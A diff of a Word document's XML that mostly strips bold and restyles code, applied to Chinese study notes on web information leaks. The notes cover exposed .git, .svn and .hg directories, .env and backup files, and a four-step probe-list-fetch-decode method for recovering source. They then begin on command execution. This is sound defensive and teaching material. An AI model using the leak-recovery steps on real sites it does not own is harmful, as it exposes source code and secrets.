+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>svn checkout</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.svn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 留在 web 根。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5714,10 +5530,24 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>正确做法：`svn export`。</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>正确做法：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>svn export</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5742,7 +5572,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>统一四步框架：探测 → 拿清单 → 取内容 → 解码。</w:t>
@@ -5755,7 +5584,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>源码包</w:t>
@@ -5815,11 +5643,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`.bak`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.bak</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5885,7 +5713,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>vim swp</w:t>
@@ -5969,11 +5796,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`.DS_Store`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.DS_Store</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6046,17 +5873,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**Git</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Git</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6120,15 +5939,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>④ 解码：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>zlib</w:t>
+        <w:t>④ 解码：zlib</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6138,17 +5949,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**SVN</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>SVN</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6235,15 +6038,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>④ 解码：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>原文</w:t>
+        <w:t>④ 解码：原文</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6253,17 +6048,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**HG</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>HG</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6350,15 +6137,22 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>④ 解码：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>zlib 或 `'u'`+原文</w:t>
+        <w:t xml:space="preserve">④ 解码：zlib 或 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>'u'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>+原文</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6367,11 +6161,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`.env`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.env</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6427,15 +6221,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>④ 解码：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>base64 -d</w:t>
+        <w:t>④ 解码：base64 -d</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6445,7 +6231,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>三个版本库的差异只有三条：</w:t>
@@ -6458,7 +6243,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>清单来源</w:t>
@@ -6545,17 +6329,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**内容路径由什么决定</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>内容路径由什么决定</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6567,15 +6343,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>Git：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>内容哈希</w:t>
+        <w:t>Git：内容哈希</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6587,15 +6355,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>SVN：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>内容哈希</w:t>
+        <w:t>SVN：内容哈希</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6607,22 +6367,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>HG：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>文件名编码</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ★</w:t>
+        <w:t>HG：文件名编码 ★</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6632,7 +6377,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>内容编码</w:t>
@@ -6697,7 +6441,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:i/>
           <w:color w:val="555555"/>
           <w:sz w:val="20"/>
@@ -6727,7 +6470,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>一句话：不是"被攻破了什么"，而是"该藏的东西被当成了公开的东西"。</w:t>
@@ -6740,7 +6482,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>三层原因：</w:t>
@@ -6753,7 +6494,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>① 表层：开发环境和部署环境没有分离</w:t>
@@ -6855,7 +6595,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>② 认知：「看不见 = 不存在」的错觉</w:t>
@@ -6971,7 +6710,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>③ 动机：便利优先于安全</w:t>
@@ -6983,18 +6721,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`git clone` 部署</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>git clone</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 部署：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7018,18 +6756,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`svn checkout` 部署</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>svn checkout</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 部署：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7046,18 +6784,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`.env` 放 web 根</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：环境变量 / 配置中心</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.env</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 放 web 根：环境变量 / 配置中心</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7067,17 +6805,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>备份放同目录</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：备份到 web 根之外</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>备份放同目录：备份到 web 根之外</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7087,7 +6817,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>结论：信息泄露的根本原因不是技术问题，是流程问题。</w:t>
@@ -7100,10 +6829,24 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>防御靠的不是 WAF，是部署前那一条 `rm -rf .git .svn .env *.bak *.swp`。</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">防御靠的不是 WAF，是部署前那一条 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>rm -rf .git .svn .env *.bak *.swp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7113,7 +6856,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>五秒自查脚本：</w:t>
@@ -7216,10 +6958,54 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>每个漏洞都在本地 `~/infoleak-lab` 或 Kali 的 `/tmp` 下用 `php -S` 复刻过：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">每个漏洞都在本地 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>~/infoleak-lab</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 或 Kali 的 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>/tmp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 下用 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>php -S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 复刻过：</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7229,17 +7015,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>Git 四种变体</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Git 四种变体：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7264,17 +7042,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>SVN</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>SVN：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7314,17 +7084,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>HG</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>HG：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7372,17 +7134,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>备份文件 / vim</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">：直接造 </w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">备份文件 / vim：直接造 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7414,11 +7168,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`.DS_Store`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.DS_Store</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7435,17 +7189,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>典型复刻脚本位置</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>典型复刻脚本位置：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7647,7 +7393,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>两个层面：</w:t>
@@ -7660,17 +7405,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**系统命令执行</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>系统命令执行</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7794,17 +7531,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**代码执行</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>代码执行</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7936,17 +7665,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>测试命令</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>测试命令：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7963,18 +7684,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**`system()`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>system()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7986,15 +7700,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>直接回显：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>✅ 有</w:t>
+        <w:t>直接回显：✅ 有</w:t>
       </w:r>
     </w:p>
